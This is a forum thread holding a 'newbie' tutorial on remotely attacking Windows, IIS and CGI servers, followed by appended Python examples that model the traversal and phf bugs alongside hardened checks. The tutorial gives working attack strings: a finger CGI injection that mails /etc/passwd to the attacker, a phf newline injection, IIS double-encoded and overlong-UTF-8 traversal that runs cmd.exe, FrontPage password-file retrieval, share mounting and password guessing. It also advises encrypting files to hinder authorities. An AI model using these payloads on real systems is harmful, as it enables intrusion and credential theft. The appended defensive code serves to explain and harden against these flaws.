
Thread: MS Exploits

  1. #1

    MS Exploits

    This is something I wrote a while back.
    It has been posted on hackergurus.tk.
    It will discuss some things about exploiting a Windows box remotely.
    Note that I found all this information on the internet.

    To get a good understanding I rewrote the info.
    This post contains attacking techniques, but to the best of my knowledge they are all outdated.
    They are meant to be used as a learning tool.

    Note: I have not discovered any of the bugs mentioned.

    Exploits for newbies by noODle.

    Most of these exploits don't work anymore because they have been patched. I wanted to give some info on how exploits work, not to give any away nor to induce people to perform illegal actions. If you are experienced with hacking this file is probably not of much interest to you.
    Well let's rumble.

    This first exploit is known as FPS exploit.
    It works with the File and Printer Sharing services built in to Windows. It is not active by default, but people with small office and home networks use this service to... share files and printers. To find out if a target is using this service you use 'nbtstat -A IP.ADDRESS.GOES.HERE'.
    You will get a listing (or an error message).
    Like this:
    Name Type Status
    -----------------------------------------------------------------------------
    <computername> <20> UNIQUE Registered
    <computername> <00> GROUP Registered
    <computername> <03> UNIQUE Registered
    <computername> <2B> UNIQUE Registered
    (can be longer)
    If you get the error message the services are not enabled. Try checking if they are enabled on your computer. In Network settings go to 'TCP/IP -> Properties -> NetBIOS' and check the box.
    If the host has 20 (the hex value between the <>) as a value, the FPS services are running. You could exploit this through DOS by giving the command: 'net view \\IP.ADDRESS.GOES.HERE'. This will give you a listing of what is shared on the computer. If the list is long, append it to a text file (>>c:\text\textfile.txt).
    Now use the command: 'net use G: \\IP.ADDRESS.GOES.HERE\sharename'. This will create a virtual drive on your box named G: (assuming G is unused). You can browse this using DOS. Don't forget to clear the drive when you are done. If you are experienced with Windows you could create an entry in your LMHOSTS file and browse the computer GUI style. Remember that you created a virtual drive and programs will be executed locally. Use 'net /?' to learn all the functions. The file sharing services use the following ports: 135-139 and, for Win2000, 445.
    Set up your own lab, experiment with friends, have fun, but do not break the law. You can and will be caught.

    The second one is also an oldy. Worth mentioning though.
    You use a simple web browser to get a password file.
    If you know the owner's email address (look on the page) you could try this:
    'http://www.TARGET_GOES_HERE.net/cgi-bin/finger'
    If it works you will see a box. Type this there:
    'victim@server.net ; /bin/mail YOURMAIL@THERE.NET < /etc/passwd'
    This will copy the victim's password file to your mailbox.
    Not getting the box?
    Try the phf technique. To find out if it is enabled type 'http://www.TARGET_GOES_HERE.net/cgi-bin/phf' in your browser. If it is enabled you will get some pop-ups. Ignore these.
    Now in the browser's location field type:
    'http://www.TARGET_GOES_HERE.net/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd'
    If this works you'll get the password file displayed in your browser. Copy it and use your password cracker. After this some common sense comes in handy.
    Read the URL and see if you can find out what any of this means. To put something on a website you can try: http://www.TARGET_GOES_HERE.net/cgi-...0a/bin/echo%20"text to be added goes here."%20>>filename.htm

    A lame trick to play on your friend using a Win95 box. When he takes a leak, get behind his box and use Ctrl-Esc to pop up the Start menu. Press Esc again. The Start button should by now have a dotted square on it. Use Alt-- (that's the Alt key and a minus character) to pop up another menu. This will enable you to close(!) the Start button. A reboot will be required to get it back on top.

    The next one will be a bit longer.(IIS)
    To get the best out of this you will have to have some understanding of how an NT server is set up. Basically it comes down to this:
    'C:\Inetpub\wwwroot\PAGEHERE.HTM'
    will look like
    'http://www.SERVER.net/PAGEHERE.HTM'.
    Since the server offers services for executing programs (i.e. CGI) it has a vulnerability.
    The folders in Inetpub serve these purposes. For example /scripts.
    You could try by typing in your browser http://www.SERVER.net/scripts/..\..\ to get to the root drive. Hmmm.
    This doesn't work, of course.
    IIS has built-in security that checks for malicious requests.
    So you use hex.
    Get an ASCII chart and look for the \.
    To give hex to IIS, use the percent symbol like this: %5C. Your browser shows you these too sometimes.
    Since IIS double checks you will have to encode it twice.
    %25 will give you the percent symbol
    %35 will give you the 5
    %43 will give you the C

    So the exploit looks like this:
    'http://www.SERVER.net/scripts/..%25%35%43..%25%35%43'.
    By now you have defeated the security check. To make this thing useful you will have to give some more parameters.
    First of all you'll have to navigate to the prog (say cmd). Then you will have to add the command you want it to execute.
    This is how you list the files of the root directory.
    'http://www.SERVER.net/scripts/..%25%35%43..%25%35%43winnt/system32/cmd.exe?/c+dir+c:\'
    Other DOS commands are also applicable.
    'http://www.SERVER.net/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\'
    will give you the same result from a different point of view.
    Look at the way IIS is set up and try typing URLs in your browser like this:
    'http://www.SERVER.net/folderhere/no_file.asp'. If it responds with 404 File Not Found the services are enabled. If it gives you 403 Forbidden they are not.
    If for example FrontPage Extensions are enabled on the server it is likely to contain the following folders.
    C:\InetPub\wwwroot\_vti_bin
    C:\InetPub\wwwroot\_vti_bin\_vti_adm
    C:\InetPub\wwwroot\_vti_bin\_vti_aut
    amongst others. You can also use telnet to perform these things. It is usually faster since you have to type in the URLs anyway. Plus it gives you better control.
    To check if the extensions are installed, telnet to the server on port 80 or 443 and perform the GET technique: 'GET /_vti_inf.html' (type in the full URL followed by two CRs).
    Next try 'GET /_vti_pvt/administrators.pwd' (or authors.pwd). If it works you'll get the password files, which will give you some access permissions.
    With your browser you can perform a trick called directory surfing. This is surfing for files that don't exist. Surf to 'http://www.server.net/dirgoeshere/filedoesnotexist.dll'.
    If it gives you a 404 File Not Found error the service is not enabled. If on the other hand it gives you a 500 Internal Server Error the services might be enabled after all. Try:
    'PUT http://www.server.net/dirgoeshere/myfile.txt'. If it works you will get an HTTP Continue message.
    Type 10 A's and press enter.
    Now either a Created or an Access Denied message is returned. If the second is the case you are unlucky today.
    To check for vulnerabilities you could also try the following:
    /***noODle © "Hmmm...
    /***noODLe © "Light another...
    Telnet to the server on the FTP port, log in as anonymous using an e-mail address. Use standard FTP commands to get the information you are looking for.
    Telnet to ports 25 & 110 to get the e-mail services talking; the error messages are very useful.
    Try some default account names like guest and guess passwords.



    Props go to:
    rhino9
    Blacksun Research Facility.
    Astalavista.
    Antionline.
    The Underground World.
    The Advanced Knowledge Network.
    Of course to the hackergurus.
    To everybody I forgot.

    For a good understanding learn several things like Perl, C and CGI programming. Set up your own (unpatched) NT IIS server network and try hacking this. This will give you a good way to study the exploits, plus it won't get you caught. Encrypt your own files. This will get you started in the world of cryptology and will make it harder for authorities to gain evidence. Microsoft's implementation of the Point-to-Point Tunneling Protocol (used for Virtual Private Networking) has been stamped as a bad implementation of a pretty secure protocol.


    That's it, my tutorial on weaknesses in MS OSes. I hope you enjoyed it.

    noODle
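Added example, not part of noODle's post and not IIS code: a Python model of why the two IIS request paths quoted above (the `..%25%35%43` and `..%c0%af` forms) slip past a check that percent-decodes once and canonicalises, while the layer that opens the file decodes a second time and accepts overlong UTF-8. The request paths are copied from the post with the hostname stripped; the BENIGN sample, the function names and the exact decoding behaviour modelled are assumptions made for illustration.

```python
"""Why '..%25%35%43' and '..%c0%af' slip past a single-pass traversal check.

Added example; not code from the post or from IIS. Two parsing quirks are
modelled (both are assumptions about the server, not measured behaviour):
  1. double percent-decoding: ..%25%35%43 -> ..%5C -> ..\\
  2. lenient UTF-8: the overlong sequence C0 AF is accepted as '/'
A filter that decodes once and canonicalises sees neither; the layer that
opens the file sees both.
"""
from urllib.parse import unquote_to_bytes

# Request paths from the post, hostnames stripped; BENIGN is constructed.
DOUBLE_ENCODED = "/scripts/..%25%35%43..%25%35%43winnt/system32/cmd.exe?/c+dir+c:\\"
OVERLONG_UTF8 = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\"
PLAIN = "/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\\"
BENIGN = "/scripts/default.asp?id=1"


def url_path(request_target: str) -> str:
    """Only the path, not the query string, is mapped onto the file system."""
    return request_target.split("?", 1)[0]


def lenient_utf8(data: bytes) -> str:
    """Decode UTF-8 permissively: overlong 2- and 3-byte forms are accepted
    instead of rejected, which is what the %c0%af trick relied on.
    Anything else undecodable becomes U+FFFD."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        tail = data[i + 1:i + 3]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and len(tail) >= 1 and 0x80 <= tail[0] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (tail[0] & 0x3F)))
            i += 2
        elif 0xE0 <= b <= 0xEF and len(tail) == 2 and all(0x80 <= c <= 0xBF for c in tail):
            out.append(chr(((b & 0x0F) << 12) | ((tail[0] & 0x3F) << 6) | (tail[1] & 0x3F)))
            i += 3
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def escapes_root(path_text: str) -> bool:
    """Resolve '.' and '..' segments (either slash kind) and report whether
    the path ever climbs above the directory it started in."""
    depth = 0
    for seg in path_text.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def naive_is_traversal(request_target: str) -> bool:
    """The kind of check the post says IIS performed: percent-decode once,
    treat the result as strict UTF-8, canonicalise, reject if it escapes."""
    once = unquote_to_bytes(url_path(request_target)).decode("utf-8", "replace")
    return escapes_root(once)


def effective_path(request_target: str) -> str:
    """What the file-system layer actually opened: the once-decoded path is
    percent-decoded again and its bytes are read as lenient UTF-8."""
    once = unquote_to_bytes(url_path(request_target))
    twice = unquote_to_bytes(once)  # the second pass turns %5C into a backslash
    return lenient_utf8(twice).replace("\\", "/")


def hardened_is_traversal(request_target: str, max_rounds: int = 4) -> bool:
    """Check the path the way it will be interpreted: decode until the text
    stops changing, decode the bytes as leniently as the consumer does, then
    canonicalise. Refuse input that never settles or is not valid text."""
    raw = url_path(request_target).encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    else:
        return True  # still changing after max_rounds: treat as hostile
    text = lenient_utf8(raw)
    return "\ufffd" in text or escapes_root(text)


if __name__ == "__main__":
    for name, target in [("double-encoded", DOUBLE_ENCODED), ("overlong utf-8", OVERLONG_UTF8),
                         ("plain %5c", PLAIN), ("benign", BENIGN)]:
        print(f"{name:15} naive={naive_is_traversal(target)!s:5} "
              f"hardened={hardened_is_traversal(target)!s:5} -> {effective_path(target)}")
```

The hardened check is the general rule behind both bypasses: canonicalise with the same (or stricter) rules as the component that consumes the path, and do it to a fixed point, instead of checking a representation the consumer will decode again.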

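Added example, not part of noODle's post and not the original phf program: a Python model of the `Qalias=x%0a...` injection the post uses against phf. The historical phf CGI handed the alias to a shell after backslash-escaping a list of metacharacters that did not include newline, so `%0a` started a second command. The query strings, the `echo alias=` stand-in for the real lookup command, and the exact contents of the METACHARS blacklist are constructed for illustration; the payload is a harmless `echo` instead of `/bin/cat /etc/passwd`.

```python
"""phf-style newline injection, vulnerable form beside the hardened form.

Added example; not the original phf code. Assumed: the CGI escaped a fixed
set of shell metacharacters (not including newline) and then ran a command
line through sh. Running this requires a POSIX sh and echo on PATH.
"""
import re
import subprocess
from urllib.parse import parse_qs

# Constructed query strings modelled on the post's URL (harmless payload).
EVIL_QUERY = "Qalias=x%0aecho%20INJECTED"
GOOD_QUERY = "Qalias=noodle"

# Blacklist of the kind the old CGI used; '\n' is conspicuously absent.
METACHARS = set("&;`'\"|*?~<>^()[]{}$\\")


def escape_shell_cmd(value: str) -> str:
    """Backslash-escape the listed metacharacters and nothing else."""
    return "".join("\\" + c if c in METACHARS else c for c in value)


def alias_from_query(query: str) -> str:
    """parse_qs percent-decodes, so %0a is a real newline from here on."""
    return parse_qs(query)["Qalias"][0]


def lookup_vulnerable(query: str) -> str:
    """Build one command line and hand it to a shell, as phf did.
    'echo alias=' stands in for the real 'ph -m alias=' lookup."""
    cmd = "echo alias=" + escape_shell_cmd(alias_from_query(query))
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def lookup_hardened(query: str):
    """Two independent fixes: allow-list the value instead of blacklisting
    characters, and never route it through a shell (argv list, so whatever
    the value contains stays a single argument). Returns None when rejected."""
    alias = alias_from_query(query)
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,64}", alias):
        return None  # rejected before anything is executed
    return subprocess.run(["echo", "alias=" + alias], capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(repr(lookup_vulnerable(EVIL_QUERY)))  # the injected second command ran
    print(repr(lookup_hardened(EVIL_QUERY)))    # None: rejected by the allow-list
    print(repr(lookup_hardened(GOOD_QUERY)))    # ordinary lookup still works
```

The blacklist fails the way blacklists usually do: it enumerates characters the author thought of, and the shell has more command separators than that. The argv form removes the shell from the picture entirely, and the allow-list is kept as a second layer in case the argument is ever interpolated into something else downstream.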
  2. #2
    Senior Member
    Join Date
    Feb 2003
    Posts
    211
    Yes... I realized that, NoOdle.
    But I have my own principle... I will do what I should do, and my decision is my decision. I put Nix and M$ on my network for balance; some people are not familiar with Nix or others, and they are so familiar with M$... that's the fact... nice tutorial, hmm, no, it is a wonderful tutorial.

    When I lay me down to sleep, Pray the LORD my soul to keep.
    If I die before i wake, Pray the LORD my soul to take.

